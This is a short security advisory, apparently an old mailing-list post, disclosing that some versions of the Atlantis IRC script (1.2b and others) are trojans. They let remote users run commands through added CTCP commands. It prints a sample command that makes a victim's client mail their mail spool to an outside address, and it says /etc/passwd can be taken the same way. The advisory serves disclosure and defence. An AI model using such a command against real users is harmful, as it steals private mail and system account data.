Some versions of a very popular (at least in romania) irc script
(Atlantis) are trojan horses which implement new ctcp commands which allow
other people on the irc world to execute irc commands in your client
INCLUDING /DCC SEND AND /EXEC
(if the client supports them)
Atlantis 1.2b is the best known version of the script and if used under
ircII (Unix version, Linux tested) The user using these two can have the
mail read by others. Sample ircII prompt; noob victim, feur intruder:
<feur> /ctcp noob version
**** CTCP VERSION reply from noob: [AtlantiS(v1.2b)] by Dethnite
<feur> /ctcp noob jupe exec cat $MAIL | mail raf@licj.soroscj.ro
in a similar way /etc/passwd can be sent, allowing the intruder to obtain
information about the users on the system.
other atlantis versions seem to be affected as well. The only version that
is clean is version 1.1. The BitchX client also "supports" the trojan.
-- Radu-Adrian Feurdean raf@licj.soroscj.ro